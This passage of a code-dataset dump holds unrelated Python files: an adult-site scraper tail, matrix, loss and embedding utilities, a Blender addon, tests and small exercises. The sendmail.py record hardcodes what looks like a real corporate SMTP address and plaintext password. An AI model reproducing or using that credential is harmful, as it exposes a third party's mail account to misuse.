请求封装为非阻塞\n :param url:\n :return:\n \"\"\"\n temp_loop = asyncio.get_event_loop()\n response = await temp_loop.run_in_executor(None, session.get, url)\n return response\n\n\nif __name__ == '__main__':\n print(\"开始爬取,请稍后,时间会较长\")\n is_exist = os.path.exists(file_name)\n if is_exist:\n with open(file_name) as f:\n reader = csv.DictReader(f)\n ids = [row['id'] for row in reader]\n else:\n ids = []\n\n with open('a.csv', 'a+', newline='') as f:\n writer = csv.DictWriter(f, csv_header)\n if not is_exist:\n writer.writeheader()\n loop = asyncio.get_event_loop()\n # loop.run_until_complete(crawl_video('http://www.pornhub.nom.co/video/naughty-america-lacey-channing-250.html'))\n # loop.run_until_complete(crawl_fragments('http://www.pornhub.nom.co/channels/8/blowjobs/', 'blowjobs'))\n loop.run_until_complete(crawl_channels())\n print('完毕,退出程序')\n","sub_path":"pornhub_nom_co/channels.py","file_name":"channels.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"282566900","text":"#!/usr/bin/python3\n\"\"\"\nmultiple a matrix using numpy\n\"\"\"\nimport numpy as np\n\n\ndef lazy_matrix_mul(m_a, m_b):\n \"\"\"\n multiple two matrix withe different size\n exemple:\n A = [[1, 2], [2, 3]] * [[1, 2], [2, 3]]\n A = [[7, 10], [15, 22]]\n\n B = [[1, 1]] * [[1, 1]]\n B = [1, 1]\n \"\"\"\n if type(m_a) != list:\n raise TypeError(\"m_a must be a list\")\n if type(m_b) != list:\n raise TypeError(\"m_b must be a list\")\n\n if type(m_a) == list and type(m_a[0]) == list:\n row_size_a = len(m_a[0])\n if type(m_b) == list and type(m_b[0]) == list:\n row_size_b = len(m_b[0])\n\n for i in m_a:\n if type(i) != list:\n raise TypeError(\"m_a must be a list of lists\")\n if len(m_a) == 0 or len(i) == 0:\n raise ValueError(\"m_a can't be empty\")\n if len(i) != row_size_a:\n raise TypeError(\"each row of m_a must be of the same size\")\n for j in i:\n if type(j) not in [float, int]:\n raise TypeError(\"m_a should contain only integers or floats\")\n for i in m_b:\n if type(i) != list:\n raise TypeError(\"m_b must be a list of lists\")\n if len(m_b) == 0 or len(i) == 0:\n raise ValueError(\"m_b can't be empty\")\n if len(i) != row_size_b:\n raise TypeError(\"each row of m_b must be of the same size\")\n for j in i:\n if type(j) not in [float, int]:\n raise TypeError(\"m_b should contain only integers or floats\")\n A = np.array(m_a)\n B = np.array(m_b)\n new = np.matmul(A, B)\n return new\n","sub_path":"0x07-python-test_driven_development/101-lazy_matrix_mul.py","file_name":"101-lazy_matrix_mul.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"440383029","text":"import torch\n\nclass LanguageModelingLossCompute:\n \" A Loss compute and train function for language modeling tasks.\"\n def __init__(self, lm_criterion, opt=None):\n self.lm_criterion = lm_criterion\n self.opt = opt\n\n # def __call__(self, X, Y, M, clf_logits, lm_logits=None, only_return_losses=False):\n def __call__(self, X, Y, M, lm_logits, only_return_losses=False):\n # Language modeling loss\n x_shifted = X[:, 1:, 0].contiguous().view(-1)\n M = M.view(-1, M.size(-1))\n lm_losses = self.lm_criterion(lm_logits, x_shifted)\n lm_losses = lm_losses.view(X.size(0), X.size(-2) - 1)\n lm_losses = lm_losses * M[:, 1:]\n lm_losses = lm_losses.sum(1) / torch.sum(M[:, 1:], 1)\n if only_return_losses:\n return lm_losses\n\n train_loss = lm_losses.sum()\n train_loss.backward()\n if self.opt is not None:\n self.opt.step()\n self.opt.zero_grad()\n return train_loss.item()\n","sub_path":"loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"588714619","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport sys, getopt\nimport argparse\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom email.header import Header\nfrom email.utils import formataddr\nimport smtplib\n\ndef sending(receivers,subject,content,attach):\n sender = 'jumpserver@idongjia.cn'\n password = 'aS7WSGwEJBtwh4re'\n message = MIMEMultipart()\n #message['From'] = Header(\"数据组\", 'utf-8')\n #message['To'] = Header(\"拍卖\", 'utf-8')\n message['From'] = formataddr([\"数据组\",sender])\n\n message['To'] = formataddr([\"数据组成员\",receivers])\n\n message['Subject'] = Header(subject, 'utf-8')\n\n message.attach(MIMEText(content+u'\\n\\n\\n超级无敌通知系统2018.04.18','plain', 'utf-8'))\n if attach is not None:\n print (attach)\n att1 = MIMEText(open(attach, 'rb').read(), 'base64', 'utf-8')\n att1[\"Content-Type\"] = 'application/octet-stream'\n att1[\"Content-Disposition\"] = 'attachment; '+'filename='+attach\n message.attach(att1)\n try:\n server=smtplib.SMTP_SSL(\"smtp.exmail.qq.com\", 465)\n server.login(sender, password)\n server.sendmail(sender,receivers,message.as_string())\n print (\"邮件发送成功\")\n except smtplib.SMTPException:\n print (\"Error: 无法发送邮件\")\n\ndef main(argv):\n parser = argparse.ArgumentParser()\n parser.add_argument('--target', '-T',\n type=str, \n help='mail_to_those_target_adresss: --target a@qq.com b@qq.com',\n nargs='+',\n default=['shuju@idongjia.cn'])\n parser.add_argument('--subject','-S',\n type=str,\n help='the subject of the mail',\n nargs=1,\n default=['job_failed'])\n\n parser.add_argument('--content','-C',\n type=str,\n help='content for the mail',\n nargs=1,\n default=[''])\n\n parser.add_argument('--attach','-A',\n type=str,\n help='attachment for the mail: --attach /data/myfile.txt',\n nargs=1,\n default=[None])\n\n args = parser.parse_args()\n print (args.target,args.subject,args.attach,args.content)\n\n sending(args.target,args.subject[0],args.content[0],args.attach[0])\n\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"utils/sendmail.py","file_name":"sendmail.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"128957315","text":"class Solution:\n def canVisitAllRooms(self, rooms):\n \"\"\"\n :type rooms: List[List[int]]\n :rtype: bool\n \"\"\"\n self.visited = [False for i in range(len(rooms))]\n self.rooms = rooms\n # Start from room 0\n self.visitRoom(0)\n return all(self.visited)\n #return False if False in self.visited else True\n\n def visitRoom(self, curr):\n self.visited[curr] = True\n for keys_to in self.rooms[curr]:\n if not self.visited[keys_to]:\n self.visitRoom(keys_to)\n\n\nprint (Solution().canVisitAllRooms([[1],[2],[3],[]]))\nprint (Solution().canVisitAllRooms([[1,3],[3,0,1],[2],[0]]))","sub_path":"leet/keysAndRooms.py","file_name":"keysAndRooms.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"37195612","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# \n\nbl_info = {\n \"name\": \"Hotkey: 'O'\",\n \"description\": \"Proportional Object/Edit Tools\",\n \"author\": \"pitiwazou, meta-androcto\",\n \"version\": (0, 1, 1),\n \"blender\": (2, 80, 0),\n \"location\": \"3D View Object & Edit modes\",\n \"warning\": \"\",\n \"wiki_url\": \"\",\n \"category\": \"Proportional Edit Pie\"\n }\n\nimport bpy\nfrom bpy.types import (\n Menu,\n Operator,\n )\n\n\n# Proportional Edit Object\nclass ProportionalEditObj(Operator):\n bl_idname = \"proportional_obj.active\"\n bl_label = \"Proportional Edit Object\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n\n if ts.use_proportional_edit_objects is True:\n ts.use_proportional_edit_objects = False\n\n elif ts.use_proportional_edit_objects is False:\n ts.use_proportional_edit_objects = True\n\n return {'FINISHED'}\n\n\nclass ProportionalSmoothObj(Operator):\n bl_idname = \"proportional_obj.smooth\"\n bl_label = \"Proportional Smooth Object\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.use_proportional_edit_objects is False:\n ts.use_proportional_edit_objects = True\n ts.proportional_edit_falloff = 'SMOOTH'\n\n if ts.proportional_edit_falloff != 'SMOOTH':\n ts.proportional_edit_falloff = 'SMOOTH'\n return {'FINISHED'}\n\n\nclass ProportionalSphereObj(Operator):\n bl_idname = \"proportional_obj.sphere\"\n bl_label = \"Proportional Sphere Object\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.use_proportional_edit_objects is False:\n ts.use_proportional_edit_objects = True\n ts.proportional_edit_falloff = 'SPHERE'\n\n if ts.proportional_edit_falloff != 'SPHERE':\n ts.proportional_edit_falloff = 'SPHERE'\n return {'FINISHED'}\n\n\nclass ProportionalRootObj(Operator):\n bl_idname = \"proportional_obj.root\"\n bl_label = \"Proportional Root Object\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.use_proportional_edit_objects is False:\n ts.use_proportional_edit_objects = True\n ts.proportional_edit_falloff = 'ROOT'\n\n if ts.proportional_edit_falloff != 'ROOT':\n ts.proportional_edit_falloff = 'ROOT'\n return {'FINISHED'}\n\n\nclass ProportionalSharpObj(Operator):\n bl_idname = \"proportional_obj.sharp\"\n bl_label = \"Proportional Sharp Object\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.use_proportional_edit_objects is False:\n ts.use_proportional_edit_objects = True\n ts.proportional_edit_falloff = 'SHARP'\n\n if ts.proportional_edit_falloff != 'SHARP':\n ts.proportional_edit_falloff = 'SHARP'\n return {'FINISHED'}\n\n\nclass ProportionalLinearObj(Operator):\n bl_idname = \"proportional_obj.linear\"\n bl_label = \"Proportional Linear Object\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.use_proportional_edit_objects is False:\n ts.use_proportional_edit_objects = True\n ts.proportional_edit_falloff = 'LINEAR'\n\n if ts.proportional_edit_falloff != 'LINEAR':\n ts.proportional_edit_falloff = 'LINEAR'\n return {'FINISHED'}\n\n\nclass ProportionalConstantObj(Operator):\n bl_idname = \"proportional_obj.constant\"\n bl_label = \"Proportional Constant Object\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.use_proportional_edit_objects is False:\n ts.use_proportional_edit_objects = True\n ts.proportional_edit_falloff = 'CONSTANT'\n\n if ts.proportional_edit_falloff != 'CONSTANT':\n ts.proportional_edit_falloff = 'CONSTANT'\n return {'FINISHED'}\n\n\nclass ProportionalRandomObj(Operator):\n bl_idname = \"proportional_obj.random\"\n bl_label = \"Proportional Random Object\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.use_proportional_edit_objects is False:\n ts.use_proportional_edit_objects = True\n ts.proportional_edit_falloff = 'RANDOM'\n\n if ts.proportional_edit_falloff != 'RANDOM':\n ts.proportional_edit_falloff = 'RANDOM'\n return {'FINISHED'}\n\n\n# Proportional Edit Edit Mode\nclass ProportionalEditEdt(Operator):\n bl_idname = \"proportional_edt.active\"\n bl_label = \"Proportional Edit EditMode\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n\n if ts.proportional_edit != ('DISABLED'):\n ts.proportional_edit = 'DISABLED'\n elif ts.proportional_edit != ('ENABLED'):\n ts.proportional_edit = 'ENABLED'\n return {'FINISHED'}\n\n\nclass ProportionalConnectedEdt(Operator):\n bl_idname = \"proportional_edt.connected\"\n bl_label = \"Proportional Connected EditMode\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.proportional_edit != ('CONNECTED'):\n ts.proportional_edit = 'CONNECTED'\n return {'FINISHED'}\n\n\nclass ProportionalProjectedEdt(Operator):\n bl_idname = \"proportional_edt.projected\"\n bl_label = \"Proportional projected EditMode\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n\n if ts.proportional_edit != ('PROJECTED'):\n ts.proportional_edit = 'PROJECTED'\n return {'FINISHED'}\n\n\nclass ProportionalSmoothEdt(Operator):\n bl_idname = \"proportional_edt.smooth\"\n bl_label = \"Proportional Smooth EditMode\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.proportional_edit == 'DISABLED':\n ts.proportional_edit = 'ENABLED'\n ts.proportional_edit_falloff = 'SMOOTH'\n\n if ts.proportional_edit_falloff != 'SMOOTH':\n ts.proportional_edit_falloff = 'SMOOTH'\n return {'FINISHED'}\n\n\nclass ProportionalSphereEdt(Operator):\n bl_idname = \"proportional_edt.sphere\"\n bl_label = \"Proportional Sphere EditMode\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.proportional_edit == 'DISABLED':\n ts.proportional_edit = 'ENABLED'\n ts.proportional_edit_falloff = 'SPHERE'\n\n if ts.proportional_edit_falloff != 'SPHERE':\n ts.proportional_edit_falloff = 'SPHERE'\n return {'FINISHED'}\n\n\nclass ProportionalRootEdt(Operator):\n bl_idname = \"proportional_edt.root\"\n bl_label = \"Proportional Root EditMode\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.proportional_edit == 'DISABLED':\n ts.proportional_edit = 'ENABLED'\n ts.proportional_edit_falloff = 'ROOT'\n\n if ts.proportional_edit_falloff != 'ROOT':\n ts.proportional_edit_falloff = 'ROOT'\n return {'FINISHED'}\n\n\nclass ProportionalSharpEdt(Operator):\n bl_idname = \"proportional_edt.sharp\"\n bl_label = \"Proportional Sharp EditMode\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.proportional_edit == 'DISABLED':\n ts.proportional_edit = 'ENABLED'\n ts.proportional_edit_falloff = 'SHARP'\n\n if ts.proportional_edit_falloff != 'SHARP':\n ts.proportional_edit_falloff = 'SHARP'\n return {'FINISHED'}\n\n\nclass ProportionalLinearEdt(Operator):\n bl_idname = \"proportional_edt.linear\"\n bl_label = \"Proportional Linear EditMode\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.proportional_edit == 'DISABLED':\n ts.proportional_edit = 'ENABLED'\n ts.proportional_edit_falloff = 'LINEAR'\n\n if ts.proportional_edit_falloff != 'LINEAR':\n ts.proportional_edit_falloff = 'LINEAR'\n return {'FINISHED'}\n\n\nclass ProportionalConstantEdt(Operator):\n bl_idname = \"proportional_edt.constant\"\n bl_label = \"Proportional Constant EditMode\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.proportional_edit == 'DISABLED':\n ts.proportional_edit = 'ENABLED'\n ts.proportional_edit_falloff = 'CONSTANT'\n\n if ts.proportional_edit_falloff != 'CONSTANT':\n ts.proportional_edit_falloff = 'CONSTANT'\n return {'FINISHED'}\n\n\nclass ProportionalRandomEdt(Operator):\n bl_idname = \"proportional_edt.random\"\n bl_label = \"Proportional Random EditMode\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ts = context.tool_settings\n if ts.proportional_edit == 'DISABLED':\n ts.proportional_edit = 'ENABLED'\n ts.proportional_edit_falloff = 'RANDOM'\n\n if ts.proportional_edit_falloff != 'RANDOM':\n ts.proportional_edit_falloff = 'RANDOM'\n return {'FINISHED'}\n\n\n# Pie ProportionalEditObj - O\nclass PieProportionalObj(Menu):\n bl_idname = \"pie.proportional_obj\"\n bl_label = \"Pie Proportional Obj\"\n\n def draw(self, context):\n layout = self.layout\n pie = layout.menu_pie()\n # 4 - LEFT\n pie.operator(\"proportional_obj.sphere\", text=\"Sphere\", icon='SPHERECURVE')\n # 6 - RIGHT\n pie.operator(\"proportional_obj.root\", text=\"Root\", icon='ROOTCURVE')\n # 2 - BOTTOM\n pie.operator(\"proportional_obj.smooth\", text=\"Smooth\", icon='SMOOTHCURVE')\n # 8 - TOP\n pie.prop(context.tool_settings, \"use_proportional_edit_objects\", text=\"Proportional On/Off\")\n # 7 - TOP - LEFT\n pie.operator(\"proportional_obj.linear\", text=\"Linear\", icon='LINCURVE')\n # 9 - TOP - RIGHT\n pie.operator(\"proportional_obj.sharp\", text=\"Sharp\", icon='SHARPCURVE')\n # 1 - BOTTOM - LEFT\n pie.operator(\"proportional_obj.constant\", text=\"Constant\", icon='NOCURVE')\n # 3 - BOTTOM - RIGHT\n pie.operator(\"proportional_obj.random\", text=\"Random\", icon='RNDCURVE')\n\n\n# Pie ProportionalEditEdt - O\nclass PieProportionalEdt(Menu):\n bl_idname = \"pie.proportional_edt\"\n bl_label = \"Pie Proportional Edit\"\n\n def draw(self, context):\n layout = self.layout\n pie = layout.menu_pie()\n # 4 - LEFT\n pie.operator(\"proportional_edt.connected\", text=\"Connected\", icon='PROP_CON')\n # 6 - RIGHT\n pie.operator(\"proportional_edt.projected\", text=\"Projected\", icon='PROP_ON')\n # 2 - BOTTOM\n pie.operator(\"proportional_edt.smooth\", text=\"Smooth\", icon='SMOOTHCURVE')\n # 8 - TOP\n pie.operator(\"proportional_edt.active\", text=\"Proportional On/Off\", icon='PROP_ON')\n # 7 - TOP - LEFT\n pie.operator(\"proportional_edt.sphere\", text=\"Sphere\", icon='SPHERECURVE')\n # 9 - TOP - RIGHT\n pie.operator(\"proportional_edt.root\", text=\"Root\", icon='ROOTCURVE')\n # 1 - BOTTOM - LEFT\n pie.operator(\"proportional_edt.constant\", text=\"Constant\", icon='NOCURVE')\n # 3 - BOTTOM - RIGHT\n pie.menu(\"pie.proportional_more\", text=\"More\", icon='LINCURVE')\n\n\n# Pie ProportionalEditEdt - O\nclass PieProportionalMore(Menu):\n bl_idname = \"pie.proportional_more\"\n bl_label = \"Pie Proportional More\"\n\n def draw(self, context):\n layout = self.layout\n pie = layout.menu_pie()\n box = pie.split().column()\n box.operator(\"proportional_edt.linear\", text=\"Linear\", icon='LINCURVE')\n box.operator(\"proportional_edt.sharp\", text=\"Sharp\", icon='SHARPCURVE')\n box.operator(\"proportional_edt.random\", text=\"Random\", icon='RNDCURVE')\n\n\nclasses = (\n ProportionalEditObj,\n ProportionalSmoothObj,\n ProportionalSphereObj,\n ProportionalRootObj,\n ProportionalSharpObj,\n ProportionalLinearObj,\n ProportionalConstantObj,\n ProportionalRandomObj,\n ProportionalEditEdt,\n ProportionalConnectedEdt,\n ProportionalProjectedEdt,\n ProportionalSmoothEdt,\n ProportionalSphereEdt,\n ProportionalRootEdt,\n ProportionalSharpEdt,\n ProportionalLinearEdt,\n ProportionalConstantEdt,\n ProportionalRandomEdt,\n PieProportionalObj,\n PieProportionalEdt,\n PieProportionalMore,\n )\n\naddon_keymaps = []\n\n\ndef register():\n for cls in classes:\n bpy.utils.register_class(cls)\n\n wm = bpy.context.window_manager\n if wm.keyconfigs.addon:\n # ProportionalEditObj\n km = wm.keyconfigs.addon.keymaps.new(name='Object Mode')\n kmi = km.keymap_items.new('wm.call_menu_pie', 'O', 'PRESS')\n kmi.properties.name = \"pie.proportional_obj\"\n addon_keymaps.append((km, kmi))\n\n # ProportionalEditEdt\n km = wm.keyconfigs.addon.keymaps.new(name='Mesh')\n kmi = km.keymap_items.new('wm.call_menu_pie', 'O', 'PRESS')\n kmi.properties.name = \"pie.proportional_edt\"\n addon_keymaps.append((km, kmi))\n\n\ndef unregister():\n for cls in classes:\n bpy.utils.unregister_class(cls)\n\n wm = bpy.context.window_manager\n kc = wm.keyconfigs.addon\n if kc:\n for km, kmi in addon_keymaps:\n km.keymap_items.remove(kmi)\n addon_keymaps.clear()\n\n\nif __name__ == \"__main__\":\n register()\n","sub_path":"engine/2.80/scripts/addons/space_view3d_pie_menus/pie_proportional_menu.py","file_name":"pie_proportional_menu.py","file_ext":"py","file_size_in_byte":14420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"524196033","text":"import enolib\n\nfrom tests.util import snapshot\n\ninput = '''\n> comment\n\nfield: value\n\nlist:\n- item\n\n> comment\n- item\n\nfieldset:\nentry = value\n\n> comment\nentry = value\n\ncopied_field < field\ncopied_fieldset < fieldset\ncopied_list < list\n\n# section\n\n> comment\n-- empty\n-- empty\n\n-- multiline\nvalue\nvalue\n-- multiline\n\ncopied_multiline < multiline\n\n## subsection\n## copy < subsection\n'''.strip()\n\nSNIPPET_PADDING_WIDTH = 3\nSNIPPET_PADDING = '▓' * SNIPPET_PADDING_WIDTH\n\n# The + ' ' before closing SNIPPET_PADDING represents the last cursor\n# (there is always one cursor index more than there are chars in a string)\nsnippet_input = SNIPPET_PADDING + input.replace('\\n', '⏎').replace('\\t', '⇥').replace(' ', '␣') + ' ' + SNIPPET_PADDING\n\ndef snippet(index):\n index += SNIPPET_PADDING_WIDTH\n\n return (\n snippet_input[index - SNIPPET_PADDING_WIDTH : index] +\n ' ' + snippet_input[index] + ' ' +\n snippet_input[index + 1 : index + SNIPPET_PADDING_WIDTH + 1]\n )\n\ndef test_lookup():\n column = 0\n line = 0\n\n summary = '\\nINDEX SNIPPET KEY RANGE\\n\\n'\n\n for index in range(0, len(input) + 1):\n index_lookup = enolib.lookup(input, index=index)\n line_column_lookup = enolib.lookup(input, line=line, column=column)\n\n if index_lookup['range'] != line_column_lookup['range']:\n raise AssertionError(f\"Lookup by index produced a different range ({index_lookup['range']}) than by line/column ({line_column_lookup['range']})\")\n\n if index_lookup['element'].string_key() != line_column_lookup['element'].string_key():\n raise AssertionError(f\"Lookup by index produced a different key ({index_lookup['element'].string_key()}) than by line/column ({line_column_lookup['element'].string_key()})\")\n\n key = 'document' if index_lookup['element'].string_key() is None else index_lookup['element'].string_key()\n summary += f\"{str(index).ljust(5)} {snippet(index).rjust(9)} => {key.ljust(20)} {index_lookup['range']}\\n\"\n\n if index < len(input) and input[index] == '\\n':\n line += 1\n column = 0\n else:\n column += 1\n\n assert summary == snapshot(summary, 'tests/snapshots/lookup.snap.txt')\n","sub_path":"python/tests/test_lookup.py","file_name":"test_lookup.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"629030598","text":"from math import ceil\n\n\nclass Primes:\n @staticmethod\n def stream():\n n = 15490000\n primes = [True] * n\n for i in range(2, int(n ** 0.5 + 1)):\n if primes[i]:\n primes[i * 2:n:i] = [False] * (ceil(n / i) - 2)\n primes[0] = primes[1] = False\n p = (num for num, is_prime in enumerate(primes) if is_prime)\n for i in p:\n yield i\n\n\ndef verify(from_n):\n stream = Primes.stream()\n for _ in range(from_n): next(stream)\n print(next(stream))\n\n\nverify(2)\n","sub_path":"codewar/2022/3/Prime_Streaming.py","file_name":"Prime_Streaming.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"461489370","text":"import os\nimport sciwing.constants as constants\nfrom typing import Dict, Union\nimport numpy as np\nfrom tqdm import tqdm\nfrom wasabi import Printer\nimport gensim\n\n\nPATHS = constants.PATHS\nEMBEDDING_CACHE_DIR = PATHS[\"EMBEDDING_CACHE_DIR\"]\n\n\nclass EmbeddingLoader:\n \"\"\"\n This handles the loading of word embeddings for a vocab\n This can handle different kinds of embeddings.\n\n \"\"\"\n\n def __init__(\n self,\n token2idx: Dict,\n embedding_type: Union[str, None] = None,\n embedding_dimension: Union[str, None] = None,\n ):\n \"\"\"\n\n :param token2idx: type: Dict\n The mapping between token2idx\n :param embedding_type: type: Union[str, None]\n \"\"\"\n self.token2idx_mapping = token2idx\n self.embedding_type = \"random\" if embedding_type is None else embedding_type\n self.embedding_dimension = embedding_dimension\n\n self.allowed_embedding_types = [\n \"glove_6B_50\",\n \"glove_6B_100\",\n \"glove_6B_200\",\n \"glove_6B_300\",\n \"random\",\n \"parscit\",\n ]\n\n assert (\n self.embedding_type in self.allowed_embedding_types\n ), \"You can use one of {0} for embedding type\".format(\n self.allowed_embedding_types\n )\n\n self.embedding_filename = self.get_preloaded_filename()\n self.vocab_embedding = {} # stores the embedding for all words in vocab\n self.msg_printer = Printer()\n\n if \"random\" in self.embedding_type:\n self.vocab_embedding = self.load_random_embedding()\n\n if \"glove\" in self.embedding_type:\n self.vocab_embedding = self.load_glove_embedding()\n\n if \"parscit\" in self.embedding_type:\n self.vocab_embedding = self.load_parscit_embedding()\n\n def get_preloaded_filename(self):\n filename = None\n\n if self.embedding_type == \"glove_6B_50\":\n filename = os.path.join(EMBEDDING_CACHE_DIR, \"glove.6B.50d.txt\")\n\n elif self.embedding_type == \"glove_6B_100\":\n filename = os.path.join(EMBEDDING_CACHE_DIR, \"glove.6B.100d.txt\")\n\n elif self.embedding_type == \"glove_6B_200\":\n filename = os.path.join(EMBEDDING_CACHE_DIR, \"glove.6B.200d.txt\")\n\n elif self.embedding_type == \"glove_6B_300\":\n filename = os.path.join(EMBEDDING_CACHE_DIR, \"glove.6B.300d.txt\")\n elif self.embedding_type == \"parscit\":\n filename = os.path.join(EMBEDDING_CACHE_DIR, \"vectors_with_unk.kv\")\n\n return filename\n\n def load_glove_embedding(self) -> Dict[str, np.array]:\n \"\"\"\n Imports the glove embedding\n Loads the word embedding for words in the vocabulary\n If the word in the vocabulary doesnot have an embedding\n then it is loaded with zeros\n TODO: Load only once in the project and store it in json file\n - Read from json file at once\n - This might be memory expensive and save a little bit of time\n :return:\n \"\"\"\n embedding_dim = int(self.embedding_type.split(\"_\")[-1])\n glove_embeddings = {}\n with self.msg_printer.loading(\"Loading GLOVE embeddings\"):\n with open(self.embedding_filename, \"r\") as fp:\n for line in tqdm(\n fp,\n desc=\"Loading embeddings from file {0}\".format(self.embedding_type),\n ):\n values = line.split()\n word = values[0]\n embedding = np.array([float(value) for value in values[1:]])\n glove_embeddings[word] = embedding\n\n tokens = self.token2idx_mapping.keys()\n\n vocab_embeddings = {}\n\n for token in tokens:\n try:\n emb = glove_embeddings[token]\n except KeyError:\n emb = np.zeros(embedding_dim)\n\n vocab_embeddings[token] = emb\n\n self.msg_printer.good(f\"Loaded Glove embeddings - {self.embedding_type}\")\n return vocab_embeddings\n\n def load_random_embedding(self) -> Dict[str, np.array]:\n tokens = self.token2idx_mapping.keys()\n\n vocab_embeddings = {}\n\n for token in tokens:\n emb = np.random.normal(loc=-0.1, scale=0.1, size=self.embedding_dimension)\n vocab_embeddings[token] = emb\n\n self.msg_printer.good(\"Finished loading Random word Embedding\")\n return vocab_embeddings\n\n def load_parscit_embedding(self) -> Dict[str, np.array]:\n pretrained = gensim.models.KeyedVectors.load(self.embedding_filename, mmap=\"r\")\n tokens = self.token2idx_mapping.keys()\n vocab_embeddings = {}\n\n for token in tokens:\n try:\n emb = pretrained[token]\n except:\n emb = pretrained[\"\"]\n vocab_embeddings[token] = emb\n\n self.msg_printer.good(\"Finished Loading Parscit Embeddings\")\n return vocab_embeddings\n","sub_path":"sciwing/vocab/embedding_loader.py","file_name":"embedding_loader.py","file_ext":"py","file_size_in_byte":4992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"222751450","text":"\nclass Route:\n\n def __init__(self,googleRoute,pois):\n self.google_route = googleRoute\n self.pois = pois\n self.route_with_waypoints = False\n self.scores = []\n self.final_score = 0.0\n self.final_google_route = None\n self.final_distance = 0.0\n\n def get_pois_coordinates(self):\n pois_return = []\n for poi in self.pois:\n pois_return.append((poi['latitude'],poi['longitude']))\n return pois_return\n\n def get_final_score(self):\n self.final_distance = 0.0\n for l in self.final_google_route['legs']:\n self.final_distance += l['distance']['value']\n len_pois = len(self.pois)\n sum_score = sum([x[1] for x in self.scores])\n self.final_score = ((len_pois * sum_score)* 1000) / self.final_distance\n\n def print_final_info(self, legs = False):\n print(\"Rota por \" + self.final_google_route['summary'])\n print(\"Distancia (metros): \" + str(self.final_distance))\n print(\"Score final : \" + str(self.final_score))\n print(\"POIs:\")\n for p in self.pois:\n print(p['name'])\n if(legs):\n for l in self.final_google_route[u'legs']:\n for s in l[u'steps']:\n print(s[u'html_instructions'])\n\n\n\n\n ","sub_path":"model/route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"382530007","text":"number = int( input(\"Enter number:\"))\nadd = 0\n\ndef sumDigit():\n global add\n num = number\n while num > 0:\n add = add + (num % 10)\n num = int(num/10)\n\nsumDigit()\nprint(\"The sum of the digits in\", number,\"is\", add)\n","sub_path":"PyLesson_07/DigitAdder.py","file_name":"DigitAdder.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"541293273","text":"import time\nfrom machine import I2C\n\n\nADXL345_ADDR = 0x53\n\ni2c = I2C(0, I2C.MASTER, baudrate=100000)\n\nBW_RATE_100HZ = 0x0B\nPOWER_CTL = 0x2D \nMEASURE = 